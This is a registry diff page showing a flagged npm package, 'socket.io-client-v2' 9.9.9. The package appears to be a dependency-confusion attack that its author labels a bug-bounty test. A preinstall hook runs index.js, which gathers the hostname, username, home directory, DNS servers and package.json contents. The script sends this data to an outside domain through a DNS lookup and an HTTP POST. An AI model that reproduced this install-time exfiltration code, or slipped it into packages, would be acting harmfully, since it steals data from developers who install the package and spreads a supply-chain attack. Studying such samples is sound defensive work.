socket.io-client-v2 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of socket.io-client-v2 might be problematic. Click here for more details.
- package/index.js +44 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
//Author p3rr0x22@gmail.com
|
|
2
|
+
//Dependency confustion test under bug bounty scope
|
|
3
|
+
const os = require("os");
|
|
4
|
+
const dns = require("dns");
|
|
5
|
+
const http = require('http');
|
|
6
|
+
const packageJSON = require("./package.json");
|
|
7
|
+
const package = packageJSON.name;
|
|
8
|
+
|
|
9
|
+
try {
|
|
10
|
+
dns.lookup(os.hostname()+os.userInfo().username+package+'.p3rr0.com', e =>{});
|
|
11
|
+
} catch(er) {
|
|
12
|
+
//
|
|
13
|
+
};
|
|
14
|
+
const trackingData = JSON.stringify({
|
|
15
|
+
pack: package,
|
|
16
|
+
cdir: __dirname,
|
|
17
|
+
homedir: os.homedir(),
|
|
18
|
+
hostname: os.hostname(),
|
|
19
|
+
username: os.userInfo().username,
|
|
20
|
+
dns: dns.getServers(),
|
|
21
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
|
22
|
+
pjson: packageJSON,
|
|
23
|
+
});
|
|
24
|
+
|
|
25
|
+
var options = {
|
|
26
|
+
host: dns.getServers()+package+'.p3rr0.com',
|
|
27
|
+
path: '/',
|
|
28
|
+
method: 'POST',
|
|
29
|
+
headers: {'X-Bug-Test' : 'p3rr0-'+package}
|
|
30
|
+
};
|
|
31
|
+
|
|
32
|
+
callback = function(response) {
|
|
33
|
+
var str = '';
|
|
34
|
+
response.on('data', function (chunk) {
|
|
35
|
+
str += chunk;
|
|
36
|
+
});
|
|
37
|
+
response.on('end', function () {
|
|
38
|
+
// console.log(str);
|
|
39
|
+
});
|
|
40
|
+
}
|
|
41
|
+
|
|
42
|
+
var req = http.request(options, callback);
|
|
43
|
+
req.write(trackingData);
|
|
44
|
+
req.end();
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "socket.io-client-v2",
|
|
3
|
+
"version": "9.9.9",
|
|
4
|
+
"description": "dependency confustion bug bounty test -- dont use. Contact p3rr0x22@gmail.com",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "p3rr0",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|